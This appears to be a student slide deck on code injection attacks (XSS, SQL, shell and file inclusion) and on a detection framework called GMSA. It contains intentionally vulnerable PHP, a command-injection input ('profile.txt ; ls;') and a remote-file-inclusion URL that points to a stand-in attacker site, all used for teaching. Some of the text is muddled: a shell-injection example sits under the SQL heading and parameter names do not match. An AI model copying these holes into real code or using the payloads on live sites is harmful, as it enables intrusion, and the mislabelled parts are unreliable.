Академический Документы
Профессиональный Документы
Культура Документы
Coordinator Name:
Muneeba Zuha K Vidya sree
Internal Guide: 16321A05B5
Swapna G IV CSE B
Code Injection Attacks
• Code Injection is the general term for attack types which consist of injecting code
that is then executed by the application.
• This type of attack exploits poor handling of untrusted data. These types of attacks
are usually made possible due to a lack of proper input/output data validation
• An authorized user can obtain access to the system’s database by inserting his or her
username and password into the system; then the system checks if the username and
password are correct or not.
• An attacker gets access to the information on the database of the webpage by using
methods of attack such as CIA
Types of Code Injection
• XSS Attacks
• SQL Injection Attacks
• Shell Injection Attacks(Command Injection Attacks)
• File Inclusion Attacks
XSS Attacks
• Cross Site Scripting attack means sending and injecting malicious code or script. Malicious
code is usually written with client-side programming languages such as JavaScript, HTML,
VBScript, Flash, etc. However, JavaScript and HTML are mostly used to perform this attack.
• The main reason for this attack is inappropriate user’s input validation, where malicious
input can get into the output. A malicious user can enter a script, which will be injected into
the website’s code. Then the browser is not able to know if the executed code is malicious or
not.
Examples:
SQL Injection Attacks
<?php
print(please specify the name of the file);
$file=$_GET[‘filename’]
system(“cat $file”);
?>
If the user gives an input ‘profile.txt’, corresponding file will be displayed.
but, suppose an attacker can give input ‘profile.txt ; ls;’. It will list all the files in the
directory.
File Inclusion Attacks
RFI allows an attacker to include and execute a remotely hosted file using a script by including it in the attack
page. The attacker can use RFI to run a malicious code either on the client side or on the server.
One of the vulnerable locations can be as follows, where the value of the “testfile” parameter is supplied by
the user:
www.victim_site.com/abc.php?testfile=example
The vulnerable PHP code is as follows:
$test = $_REQUEST[“testfile”];
Include($test.”.php”);
Following is one of the possible attack vectors for the above-mentioned vulnerable PHP code:
www.victim_site.com/abc.php?test=http://www.attacker_site.com/attack_page
The file “attack_page” is now included into the vulnerable include page available on the server and it gets
executed whenever the “abc.php” page is accessed or executed. The attacker can carve malicious code in this
“attack_page” and can perform malicious activities.
Local file inclusion:
The local file inclusion vulnerability is a process of including the local files available on the server. This
vulnerability occurs when a user input contains the path to the file that has to be included. When such an input is
not properly sanitized, the attacker may give some default file names and access unauthorized files, or an attacker
may also make use of directory traversal characters and retrieve sensitive files available in other directories.
• The technique of the GMSA framework is to detect signatures that an attacker could
use when attempting a code injection attack.
• Most research has focused on the two major types of CIA, namely SQL injection and
XSS attacks
• GMSA which considers all possible CIAs and their mitigating strategies. Our empirical
analysis demonstrates that GMSA is significant in detecting CIA with a low false
positive rate of around 0.59%.
PROPOSED GMSA MODEL
In this section we present the GMSA model for detecting and classifying CIAs.
There are five phases:
Phase 1-URL Collection
Phase 2- Proposed Method
Phase 3- Dataset Testing
Phase 4- Proposed Classifier
Phase 5- Classifier Result.
Phase 1: URL COLLECTION
Initially, the dataset for the URL Collection, consisting of both benign and malicious URLs
was collected from two different resources. Dataset A was downloaded from HTTP
DATASET CSIC 2010 which consists of large amounts of code injection attack datasets,
while Dataset B was downloaded from SecLists which is a security tester’s companion.
Phase 4: CLASSIFIER
• In the Proposed Classifier, our proposed framework receives the link’s code from the
dataset, and checks whether it is benign or malicious.
• We check, classify, and validate the training and testing datasets with the GMSA
framework to generate and construct the Classifier Result.
Phase 5: CLASSIFIER RESULT
The last phase is known as the Classifier Result. In this phase the GMSA framework informs
us whether each link’s code in the datasets is benign or malicious.
We collect the results of the Proposed Classifier and determine the output result which
consists of
Precision Rate (PR),
Recall Rate (RR),
False Positive (FP),
False Negative (FN),
True Positive (TP),
True Negative (TN)
Accuracy (ACC)
ROC DIAGRAM OF DATASET A